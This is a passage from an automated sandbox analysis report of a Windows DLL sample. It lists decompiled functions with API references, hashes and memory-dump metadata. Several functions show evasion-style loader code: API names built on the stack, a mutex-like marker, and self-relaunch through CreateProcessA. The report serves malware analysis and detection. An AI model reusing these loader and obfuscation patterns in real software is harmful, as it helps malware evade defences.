						if(_t47 != 0 &&  *_t47 == 0) {
							E6F33FEFF(_t47);
							E6F344706( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6F33FEFF( *((intOrPtr*)(_t74 + 0x7c)));
						E6F33FEFF( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6F33FEFF( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6F344410( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6f366260) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6F33FEFF(_t31);
							E6F33FEFF( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6F33FEFF(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6F33FEFF(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6F3442E1

Part of subcall function 6F344608: _free.LIBCMT ref: 6F344625
Part of subcall function 6F344608: _free.LIBCMT ref: 6F344637
Part of subcall function 6F344608: _free.LIBCMT ref: 6F344649
Part of subcall function 6F344608: _free.LIBCMT ref: 6F34465B
Part of subcall function 6F344608: _free.LIBCMT ref: 6F34466D
Part of subcall function 6F344608: _free.LIBCMT ref: 6F34467F
Part of subcall function 6F344608: _free.LIBCMT ref: 6F344691
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446A3
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446B5
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446C7
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446D9
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446EB
Part of subcall function 6F344608: _free.LIBCMT ref: 6F3446FD

_free.LIBCMT ref: 6F3442D6

Part of subcall function 6F33FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F3442F8
_free.LIBCMT ref: 6F34430D
_free.LIBCMT ref: 6F344318
_free.LIBCMT ref: 6F34433A
_free.LIBCMT ref: 6F34434D
_free.LIBCMT ref: 6F34435B
_free.LIBCMT ref: 6F344366
_free.LIBCMT ref: 6F34439E
_free.LIBCMT ref: 6F3443A5
_free.LIBCMT ref: 6F3443C2
_free.LIBCMT ref: 6F3443DA

Strings

`b6o, xrefs: 6F344389

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: `b6o
API String ID: 161543041-86039277
Opcode ID: 609af3b3dc42555ce878ed0116bea1931d8d1b2c6d19e9bb5ab9ea65735fd64c
Instruction ID: 44b6cbb82f5eb9c9f935fb7ca9da32ef2b8daf1a3c84b6a2d2bd6cec7b533b61
Opcode Fuzzy Hash: 609af3b3dc42555ce878ed0116bea1931d8d1b2c6d19e9bb5ab9ea65735fd64c
Instruction Fuzzy Hash: 14316D32A04745DFEB249E39D840B8A73E9FF80754F61462AE899DB691DF32F850C720

Uniqueness

Uniqueness Score: -1.00%

Function 6F321305, Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321305() {
				char _v5;
				intOrPtr _v9;
				intOrPtr _v13;
				char _v17;
				char _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				char _v30;
				char _v31;
				char _v32;
				short _v34;
				intOrPtr _v38;
				char _v42;
				char _v43;
				intOrPtr _v47;
				intOrPtr _v51;
				char _v55;
				char _v56;
				intOrPtr _v60;
				char _v64;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;

				_v64 = 0x6e72656b;
				_v60 = 0x32336c65;
				_v56 = 0;
				_v55 = 0x74726956;
				_v51 = 0x416c6175;
				_v47 = 0x636f6c6c;
				_v43 = 0;
				_v42 = 0x74726956;
				_v38 = 0x466c6175;
				_v34 = 0x6572;
				_v32 = 0x65;
				_v31 = 0;
				_v30 = 0x61657243;
				_v26 = 0x754d6574;
				_v22 = 0x41786574;
				_v18 = 0;
				_v17 = 0x4c746547;
				_v13 = 0x45747361;
				_v9 = 0x726f7272;
				_v5 = 0;
				_t21 =  &_v64; // 0x6e72656b
				_t26 = GetModuleHandleA(_t21);
				if(_t26 != 0) {
					_t22 =  &_v55; // 0x74726956
					 *0x6f366064 = GetProcAddress(_t26, _t22);
					_t28 = _t26;
					_t23 =  &_v42; // 0x74726956
					 *0x6f366068 = GetProcAddress(_t28, _t23);
					_t30 = _t28;
					_t24 =  &_v30; // 0x61657243
					 *0x6f36606c = GetProcAddress(_t30, _t24);
					_t32 = _t30;
					_t33 = GetProcAddress(_t32,  &_v17);
					"@Mxt7ce3e80173264ea19b05306b865eadf9" = _t33;
					return _t33;
				}
				return _t26;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F321388
GetProcAddress.KERNEL32(00000000,VirtualAlloc), ref: 6F321398
GetProcAddress.KERNEL32(6E72656B,VirtualFreCreateMutexA), ref: 6F3213AA
GetProcAddress.KERNEL32(32336C65,CreateMutexA), ref: 6F3213BC
GetProcAddress.KERNEL32(00000000,4C746547), ref: 6F3213CD

Strings

VirtualAlloc, xrefs: 6F321393, 6F321396
VirtualFreCreateMutexA, xrefs: 6F3213A5, 6F3213A8
@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F3213D3
rror, xrefs: 6F321379
texA, xrefs: 6F321360
astE, xrefs: 6F321372
GetL, xrefs: 6F32136B
kernel32, xrefs: 6F321384, 6F321387

Memory Dump Source

Source File: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9$GetL$VirtualAlloc$VirtualFreCreateMutexA$astE$kernel32$rror$texA
API String ID: 667068680-3237107477
Opcode ID: 8930f11d1a828a2024604b44b263c1f36a6334e4cbbab1b0bd4711def4c2732b
Instruction ID: 42160fb019ef96c739fead229ba0131238a461c4f0d3bcbf5f2f025f3e764bb1
Opcode Fuzzy Hash: 8930f11d1a828a2024604b44b263c1f36a6334e4cbbab1b0bd4711def4c2732b
Instruction Fuzzy Hash: 182135B1C08748AEEF01EFE4C548BEEBB79EB46750F10815DE441AA254DB758618CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6F340EF4, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F340EF4(void* __edx, void* __esi, char _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0x6f348a38;
				if(_t67 != 0x6f348a38) {
					E6F33FEFF(_t67);
					_t36 = _a4;
				}
				E6F33FEFF( *((intOrPtr*)(_t36 + 0x3c)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x30)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x34)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x38)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x28)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x2c)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x40)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x44)));
				E6F33FEFF( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6F340D3C( &_v5, _t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6F340D9D( &_v5, _t71, _t72, _t76);
			}

APIs

_free.LIBCMT ref: 6F340F0A

Part of subcall function 6F33FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?), ref: 6F33FF15
Part of subcall function 6F33FEFF: GetLastError.KERNEL32(?,?,6F344799,?,00000000,?,00000000,?,6F3447C0,?,00000007,?,?,6F344436,?,?), ref: 6F33FF27

_free.LIBCMT ref: 6F340F16
_free.LIBCMT ref: 6F340F21
_free.LIBCMT ref: 6F340F2C
_free.LIBCMT ref: 6F340F37
_free.LIBCMT ref: 6F340F42
_free.LIBCMT ref: 6F340F4D
_free.LIBCMT ref: 6F340F58
_free.LIBCMT ref: 6F340F63
_free.LIBCMT ref: 6F340F71

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c9ab71a98c6c097b8be581a36d65b57bfd8c79f63d845fc3b061f3f7166616bc
Instruction ID: 698e468f3e5bd060473d657e8caa1bd667f0a56f09c73bcaf202dec6484bfe8f
Opcode Fuzzy Hash: c9ab71a98c6c097b8be581a36d65b57bfd8c79f63d845fc3b061f3f7166616bc
Instruction Fuzzy Hash: E321EA76900298AFCB05EFA8C880DDE7BB9BF48340F5142A6F5559B661DB31EA54CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6F33D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F33D3D0(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t75;
				char _t77;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t110;

				_t71 = _a8;
				_v5 = 0;
				_t93 = _t71 + 0x10;
				_push(_t93);
				_v16 = 1;
				_v20 = _t93;
				_v12 =  *(_t71 + 8) ^  *0x6f36609c;
				E6F33D390( *(_t71 + 8) ^  *0x6f36609c);
				E6F33D717(_a12);
				_t51 = _a4;
				_t102 = _t101 + 0xc;
				_t90 =  *((intOrPtr*)(_t71 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						E6F33D700(_t71, 0xfffffffe, _t93, 0x6f36609c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t75 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
							_t59 = _t75 + _t58 * 4;
							_t76 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t77 = _v5;
								goto L8;
							} else {
								_t60 = E6F33D6B0(_t76, _t93);
								_t77 = 1;
								_v5 = 1;
								_t110 = _t60;
								if(_t110 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									E6F33D390(_v12);
									goto L15;
								} else {
									if(_t110 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6f348a30;
											if(__eflags != 0) {
												_t67 = E6F346B90(__eflags, 0x6f348a30);
												_t102 = _t102 + 4;
												__eflags = _t67;
												if(_t67 != 0) {
													_t97 =  *0x6f348a30; // 0x6f33e30c
													 *0x6f348124(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t102 = _t102 + 8;
												}
												_t61 = _a4;
											}
										}
										E6F33D6E4(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											E6F33D700(_t63, _t90, _t93, 0x6f36609c);
											_t63 = _a8;
										}
										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
										_t64 = E6F33D390(_v12);
										E6F33D6C8();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t98, _t93);
										__eflags = _t64;
										if(_t64 != 0) {
											_push(_t93);
											do {
												_t95 =  *_t64;
												E6F33E93F(_t64);
												_t64 = _t95;
												__eflags = _t95;
											} while (_t95 != 0);
											return _t64;
										}
										return _t64;
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t90 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t77 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6F33D3FB
___except_validate_context_record.LIBVCRUNTIME ref: 6F33D403
_ValidateLocalCookies.LIBCMT ref: 6F33D491
__IsNonwritableInCurrentImage.LIBCMT ref: 6F33D4BC
_ValidateLocalCookies.LIBCMT ref: 6F33D511

Strings

csm, xrefs: 6F33D4A6

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 745515659c2fe70e0534c2249c81e9af7c9f374acd2f3292b7f9b8123b07e564
Instruction ID: e62480db0368ae6c9a4deb5eac5d2a51f4c1e8867bb5710e5ff9492615aa8578
Opcode Fuzzy Hash: 745515659c2fe70e0534c2249c81e9af7c9f374acd2f3292b7f9b8123b07e564
Instruction Fuzzy Hash: 8341C836E0426CABCF00DF68C840ADEBBB6BF45328F118156D8199B391DB32F915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F340262, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F340262(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6f37e350 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6f348ce8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6F33FE77(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6F33FE77(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

ext-ms-, xrefs: 6F3402CD
api-ms-, xrefs: 6F3402B9

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 19ab0106cd6379729c42989a4e308868e20c531b42942a649bc906f70f02ae33
Instruction ID: 974693204dd7d5f4a2bf7ae27c1e1c9dabaf08ee42c219798bdccc305c5b0051
Opcode Fuzzy Hash: 19ab0106cd6379729c42989a4e308868e20c531b42942a649bc906f70f02ae33
Instruction Fuzzy Hash: 25212BB1B45624BBDB119A348D40A4E3FEC9F66770F211215EC55AB2C1DB32ED04C5E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F3211A4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E6F3211A4() {
				void* _v3;
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v28;
				char _v29;
				short _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				char _v43;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v136;
				intOrPtr* _t29;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t35;
				void* _t37;
				signed int* _t40;
				signed int _t48;
				signed int _t54;

				_v52 = 0x6e72656b;
				_v48 = 0x32336c65;
				asm("aam 0x65");
				asm("insb");
				_t54 = _t48 ^  *_t40;
				_v44 = 0;
				_v43 = 0x43746547;
				if(_t54 != 0) {
					_v39 = 0x616d6d6f;
					_v35 = 0x694c646e;
					_v31 = 0x656e;
					_v29 = 0x41;
					_v28 = 0;
					_v27 = 0x61657243;
					_v23 = 0x72506574;
					_v19 = 0x7365636f;
					_v15 = 0x4173;
					_v13 = 0;
					_v12 = 0;
					_v8 = 0;
				}
				asm("cld");
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				E6F33C640(_t29);
				E6F321426( &_v136, 0, 0x44);
				E6F321426( &_v68, 0, 0x10);
				_t19 =  &_v52; // 0x6e72656b
				_t33 = GetModuleHandleA(_t19);
				_t20 =  &_v43; // 0x43746547
				_v12 = GetProcAddress(_t33, _t20);
				_t35 = _t33;
				_t22 =  &_v27; // 0x61657243
				_v8 = GetProcAddress(_t35, _t22);
				_t37 = _v12();
				_push( &_v68);
				_push( &_v136);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push(0);
				_push(0);
				_push(_t37);
				_push(0);
				if(_v8() != 0) {
					 *0x6f366060 = _v68;
					E6F33C650();
				}
				E6F33C630();
				L7:
				goto L7;
			}

0x6f3211ad
0x6f3211b4
0x6f3211b6
0x6f3211b8
0x6f3211b9
0x6f3211bb
0x6f3211bf
0x6f3211c3
0x6f3211c6
0x6f3211cd
0x6f3211d4
0x6f3211da
0x6f3211de
0x6f3211e2
0x6f3211e9
0x6f3211f0
0x6f3211f7
0x6f3211fd
0x6f321201
0x6f321208
0x6f321208
0x6f32120a
0x6f32120b
0x6f32120d
0x6f32120f
0x6f32121f
0x6f32122f
0x6f321237
0x6f32123b
0x6f321242
0x6f32124d
0x6f321250
0x6f321251
0x6f32125c
0x6f32125f
0x6f321265
0x6f32126c
0x6f32126d
0x6f32126f
0x6f321271
0x6f321273
0x6f321275
0x6f321277
0x6f321279
0x6f32127a
0x6f321281
0x6f321286
0x6f32128b
0x6f32128b
0x6f321290
0x6f321295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F32123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F321247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F321256

Part of subcall function 6F33C650: ExitProcess.KERNEL32 ref: 6F33C657

Strings

sA, xrefs: 6F3211F7
GetCommandLineCreateProcessA, xrefs: 6F321242, 6F321245
kernel32, xrefs: 6F321237, 6F32123A

Memory Dump Source

Source File: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ExitHandleModuleProcess
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 1008726298-1906453927
Opcode ID: 332e5bfa4e15e63fa7738ea2df6f749f3a0894d7f185e108d4049841d8b87df8
Instruction ID: daeb7d9119097033d96b27e81e512ba040f5f65a0429bcf9062e6a272523041b
Opcode Fuzzy Hash: 332e5bfa4e15e63fa7738ea2df6f749f3a0894d7f185e108d4049841d8b87df8
Instruction Fuzzy Hash: E5217AB1D04308EAEF10EFE0CD45BEEBBB9BF44B04F108448E240BA284D7B05644CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F321167, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6F321167() {
				intOrPtr* _t25;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t31;
				void* _t33;
				void* _t43;
				void* _t44;
				void* _t48;

				if(_t48 != 0) {
					 *((intOrPtr*)(_t43 - 0x23)) = 0x616d6d6f;
					 *((intOrPtr*)(_t43 - 0x1f)) = 0x694c646e;
					 *((short*)(_t43 - 0x1b)) = 0x656e;
					 *((char*)(_t43 - 0x19)) = 0x41;
					 *((char*)(_t43 - 0x18)) = 0;
					 *((intOrPtr*)(_t43 - 0x17)) = 0x61657243;
					 *((intOrPtr*)(_t43 - 0x13)) = 0x72506574;
					 *((intOrPtr*)(_t43 - 0xf)) = 0x7365636f;
					 *((short*)(_t43 - 0xb)) = 0x4173;
					 *((char*)(_t43 - 9)) = 0;
					 *((intOrPtr*)(_t43 - 8)) = 0;
					 *((intOrPtr*)(_t43 - 4)) = 0;
				}
				_t44 = _t43 + 1;
				asm("cld");
				 *_t25 =  *_t25 + _t25;
				 *_t25 =  *_t25 + _t25;
				E6F33C640(_t25);
				E6F321426(_t44 - 0x84, 0, 0x44);
				E6F321426(_t44 - 0x40, 0, 0x10);
				_t15 = _t44 - 0x30; // 0x6e72656b
				_t29 = GetModuleHandleA(_t15);
				_t16 = _t44 - 0x27; // 0x43746547
				 *((intOrPtr*)(_t44 - 8)) = GetProcAddress(_t29, _t16);
				_t31 = _t29;
				_t18 = _t44 - 0x17; // 0x61657243
				 *((intOrPtr*)(_t44 - 4)) = GetProcAddress(_t31, _t18);
				_t33 =  *((intOrPtr*)(_t44 - 8))();
				_push(_t44 - 0x40);
				_push(_t44 - 0x84);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push(0);
				_push(0);
				_push(_t33);
				_push(0);
				if( *((intOrPtr*)(_t44 - 4))() != 0) {
					 *0x6f366060 =  *((intOrPtr*)(_t44 - 0x40));
					E6F33C650();
				}
				E6F33C630();
				L6:
				goto L6;
			}

0x6f3211c3
0x6f3211c6
0x6f3211cd
0x6f3211d4
0x6f3211da
0x6f3211de
0x6f3211e2
0x6f3211e9
0x6f3211f0
0x6f3211f7
0x6f3211fd
0x6f321201
0x6f321208
0x6f321208
0x6f321209
0x6f32120a
0x6f32120b
0x6f32120d
0x6f32120f
0x6f32121f
0x6f32122f
0x6f321237
0x6f32123b
0x6f321242
0x6f32124d
0x6f321250
0x6f321251
0x6f32125c
0x6f32125f
0x6f321265
0x6f32126c
0x6f32126d
0x6f32126f
0x6f321271
0x6f321273
0x6f321275
0x6f321277
0x6f321279
0x6f32127a
0x6f321281
0x6f321286
0x6f32128b
0x6f32128b
0x6f321290
0x6f321295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F32123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F321247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F321256

Strings

sA, xrefs: 6F3211F7
GetCommandLineCreateProcessA, xrefs: 6F321242, 6F321245
kernel32, xrefs: 6F321237, 6F32123A

Memory Dump Source

Source File: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 667068680-1906453927
Opcode ID: 0e1123ccac51313b1da447c020553779f25974830ac46677bb32401ef8926714
Instruction ID: 7c5433b20faf0ec8ca4b099c31d2c7690c221a8f38fe46dda86d5c404f08fff9
Opcode Fuzzy Hash: 0e1123ccac51313b1da447c020553779f25974830ac46677bb32401ef8926714
Instruction Fuzzy Hash: 82219AB1D04348EAEF10EFE0CD05BEEBBB9AF40B00F108449E240BA1C0D7B15644CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F3447A7, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3447A7(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
